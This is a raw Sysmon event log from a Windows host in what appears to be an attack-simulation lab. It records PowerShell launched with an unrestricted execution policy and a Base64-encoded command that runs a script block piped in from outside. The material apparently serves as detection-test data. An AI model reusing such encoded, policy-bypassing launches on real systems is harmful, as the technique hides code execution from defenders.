12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-6440-6064-D902-00000000AD01}37122676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7eae91fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c683(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c2be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7ea345bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df29230(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df8cca2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6ecb1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6ecb1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6eb42(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df5f862(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6cda4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c971(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c683(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c2be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7ea345bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df51569(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df50adb(wow64) 154100x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.630{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.560{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.560{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:00.544{266CAFBE-6440-6064-D902-00000000AD01}3712\PSHost.132616656004785682.3712.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.529{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kuak4m2y.51p.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.529{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_up2lci2i.4hf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.513{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_up2lci2i.4hf.ps12021-03-31 12:00:00.513 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.497{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-6440-6064-D802-00000000AD01}4220624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|UNKNOWN(00007FF8E8150069)|UNKNOWN(00007FF8E75D34F2)|UNKNOWN(00007FF8E75D312D)|UNKNOWN(00007FF8E809B42B)|UNKNOWN(00007FF8E759009F)|UNKNOWN(00007FF8E75F3B11)|UNKNOWN(00007FF8E75D5B20)|UNKNOWN(00007FF8E75D5B20)|UNKNOWN(00007FF8E75D59B1)|UNKNOWN(00007FF8E75C66D1)|UNKNOWN(00007FF8E75D3C13)|UNKNOWN(00007FF8E75D37E0)|UNKNOWN(00007FF8E75D34F2)|UNKNOWN(00007FF8E75D312D)|UNKNOWN(00007FF8E809B42B)|UNKNOWN(00007FF8E75B83D8)|UNKNOWN(00007FF8E75B794A) 154100x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.478{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 